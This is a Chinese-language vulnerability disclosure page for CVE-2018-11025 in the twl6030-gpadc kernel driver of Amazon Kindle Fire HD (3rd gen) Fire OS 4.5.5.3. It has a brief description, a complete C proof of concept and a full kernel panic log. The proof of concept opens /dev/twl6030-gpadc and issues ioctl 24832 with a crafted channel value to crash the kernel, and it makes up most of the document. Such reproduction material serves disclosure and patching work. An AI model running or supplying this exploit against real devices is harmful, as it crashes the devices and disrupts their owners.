(CVE 2018 11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞
一、漏洞简介¶
Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/mfd/twl6030-gpadc.c允许攻击者通过设备/ dev / twl6030上的ioctl的参数注入特制的参数-gpadc命令**24832**并导致内核崩溃。
要探索此漏洞,必须打开设备文件/ dev / twl6030-gpadc,并使用命令**24832**和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。
二、漏洞影响¶
Fire OS 4.5.5.3
三、复现过程¶
poc¶
/* * This is poc of Kindle Fire HD 3rd * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes * the system crash via IOCTL 24832. * * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc. * */ #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <sys/ioctl.h> const static char *driver = "/dev/twl6030-gpadc"; static command = 24832; struct twl6030_gpadc_user_parms { int channel; int status; unsigned short result; }; int main(int argc, char **argv, char **env) { struct twl6030_gpadc_user_parms payload; payload.channel = 0x9b2a9212; payload.status = 0x0; payload.result = 0x0; int fd = 0; fd = open(driver, O_RDWR); if (fd < 0) { printf("Failed to open %s, with errno %d\n", driver, errno); system("echo 1 > /data/local/tmp/log"); return -1; } printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command); printf("System will crash and reboot.\n"); if(ioctl(fd, command, &payload) < 0) { printf("Allocation of structs failed, %d\n", errno); system("echo 2 > /data/local/tmp/log"); return -1; } close(fd); return 0; }
崩溃日志¶
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc [18460.330139] pgd = ca210000 [18460.333251] [4b3f25fc] *pgd=00000000 [18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM [18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O) [18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1) [18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180 [18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484 [18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013 [18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04 [18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec [18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec [18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001 [18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user [18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015 [18460.418609] [18460.418609] PC: 0xc031b000: [18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008 [18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0 [18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f [18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102 [18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc [18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800 [18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004 [18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004 [18460.508544] [18460.508544] LR: 0xc031a8d0: [18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878 [18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454 [18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a [18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69 [18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000 [18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025 [18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc [18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6 [18460.598571] [18460.598571] SP: 0xde94dd10: [18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff [18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8 [18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608 [18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff [18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000 [18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8 [18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001 [18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818 [18460.688629] [18460.688659] FP: 0xde94de84: [18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 [18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 [18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 [18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 [18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 [18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 [18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 [18460.768096] df64 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400 [18460.778625] [18460.778625] R1: 0xde94de68: [18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90 [18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff [18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001 [18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000 [18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c [18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c [18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 [18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000 [18460.868713] [18460.868713] R3: 0xfffffe34: [18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ******** [18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ******** [18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ******** [18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ******** [18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ******** [18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ******** [18460.958709] [18460.958709] R7: 0xde94bf80: [18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000 [18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000 [18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c [18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204 [18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80 [18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8 [18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000 [18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000 [18461.048828] [18461.048828] R9: 0xdcccf588: [18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58 [18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000 [18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000 [18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000 [18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800 [18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25 [18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000 [18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684 [18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8) [18461.146697] Stack: (0xde94dd90 to 0xde94e000) [18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000 [18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8 [18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001 [18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000 [18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800 [18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360 [18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002 [18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001 [18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 [18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 [18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 [18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 [18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 [18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 [18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 [18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 [18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8 [18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec [18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604 [18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000 [18461.335296] Backtrace: [18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4) [18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000 [18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84) [18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30) [18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618 [18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134) [18461.401061] Board Information: [18461.401061] Revision : 0001 [18461.401092] Serial : 0000000000000000 [18461.401092] SoC Information: [18461.401092] CPU : OMAP4470 [18461.401122] Rev : ES1.0 [18461.401122] Type : HS [18461.401122] Production ID: 0002B975-000000CC [18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004 [18461.401153] [18461.406127] audit_printk_skb: 111 callbacks suppressed [18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file [18461.534057] ---[ end trace f98f4a7b98572f61 ]--- [18461.540374] Kernel panic - not syncing: Fatal exception [18461.546173] CPU1: stopping [18461.549285] Backtrace: [18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c) [18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950 [18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4) [18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60) [18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60) [18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8) [18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0 [18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0 [18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff [18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed [18461.635559] CPU0 PC (0) : 0xc003ee38 [18461.639617] CPU0 PC (1) : 0xc003ee54 [18461.643798] CPU0 PC (2) : 0xc003ee54 [18461.647857] CPU0 PC (3) : 0xc003ee54 [18461.651916] CPU0 PC (4) : 0xc003ee54 [18461.656097] CPU0 PC (5) : 0xc003ee54 [18461.660156] CPU0 PC (6) : 0xc003ee54 [18461.664215] CPU0 PC (7) : 0xc003ee54 [18461.668395] CPU0 PC (8) : 0xc003ee54 [18461.672454] CPU0 PC (9) : 0xc003ee54 [18461.676513] CPU1 PC (0) : 0xc0019b2c [18461.680694] CPU1 PC (1) : 0xc0019b2c [18461.684753] CPU1 PC (2) : 0xc0019b2c [18461.688812] CPU1 PC (3) : 0xc0019b2c [18461.692871] CPU1 PC (4) : 0xc0019b2c [18461.697051] CPU1 PC (5) : 0xc0019b2c [18461.701110] CPU1 PC (6) : 0xc0019b2c [18461.705169] CPU1 PC (7) : 0xc0019b2c [18461.709381] CPU1 PC (8) : 0xc0019b2c [18461.713409] CPU1 PC (9) : 0xc0019b2c [18461.717498] [18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017 [18461.719299]